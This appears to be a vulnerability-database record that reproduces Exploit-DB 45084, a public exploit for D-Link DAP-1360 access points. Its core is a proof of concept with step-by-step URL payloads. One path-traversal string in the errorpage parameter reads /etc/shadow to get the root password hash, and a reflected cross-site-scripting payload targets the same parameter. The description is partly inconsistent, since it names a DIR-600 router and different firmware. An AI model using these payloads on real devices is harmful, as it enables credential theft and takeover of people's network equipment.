Sign-up

ID

VAR-E-201807-0180


EDB ID

45084


TITLE

D-link DAP-1360 - Path Traversal / Cross-Site Scripting - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45084

DESCRIPTION

D-link DAP-1360 - Path Traversal / Cross-Site Scripting.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 45084

AFFECTED PRODUCTS

vendor:d linkmodel:dap-1360scope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 45084 // EDBNET: 98736

EXPLOIT

# Exploit Title: D-Link DAP-1360 File path traversal and Cross site
scripting[reflected] can lead to Authentication Bypass easily.
# Date: 20-07-2018
# Exploit Author: r3m0t3nu11
# Contact : http://twitter.com/r3m0t3nu11
# Vendor : www.dlink.com
# Version: Hardware version: F1
Firmware version: 6.O5
# Tested on:All Platforms

1) Description

After Successfully Connected to D-Link DIR-600
Router(FirmWare Version : 2.01), Any User Can Bypass The Router's
Root password as well bypass admin panel.

D-Link DAP-1360 devices with v6.x firmware allow remote attackers to
read passwords via a errorpage paramater which lead to absolute path
traversal attack,

Its More Dangerous when your Router has a public IP with remote login
enabled.

IN MY CASE,
Tested Router IP : http://192.168.70.69/

Video POC : https://www.dropbox.com/s/tvpq2jm3jv48j3c/D-link.mov?dl=0

2) Proof of Concept

Step 1: Go to
Router Login Page : http://192.168.70.69:80

Step 2:
Add the payload to URL.

Payload:
getpage=html%2Findex.html&errorpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085

Now u can get root password by reading /etc/shadow.

2- XSS
Step 1: Go to
Router Login Page : http://192.168.70.69:80

Step 2:
Add the payload to URL.

Payload:
getpage=html%2Findex.html&errorpage=<Script>alert('r3m0t3nu11')</script>&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085

u will get r3m0t3nu11 name pop up as reflected xss

Greetz to : Samir Hadji,0n3,C0ld Z3r0,alm3refh group,0x30 team,zero way team.

Trust: 1.0

sources: EXPLOIT-DB: 45084

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45084

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45084

TYPE

Path Traversal / Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 45084 // EDBNET: 98736

TAGS

tag:Cross-Site Scripting (XSS)

Trust: 1.0

tag:Traversal

Trust: 1.0

sources: EXPLOIT-DB: 45084

CREDITS

r3m0t3nu11

Trust: 0.6

sources: EXPLOIT-DB: 45084

EXTERNAL IDS

db:EXPLOIT-DBid:45084

Trust: 1.6

db:EDBNETid:98736

Trust: 0.6

sources: EXPLOIT-DB: 45084 // EDBNET: 98736

REFERENCES

url:https://www.exploit-db.com/exploits/45084/

Trust: 0.6

sources: EDBNET: 98736

SOURCES

db:EXPLOIT-DBid:45084
db:EDBNETid:98736

LAST UPDATE DATE

2022-07-27T09:58:20.684000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:45084date:2018-07-24T00:00:00
db:EDBNETid:98736date:2018-07-28T00:00:00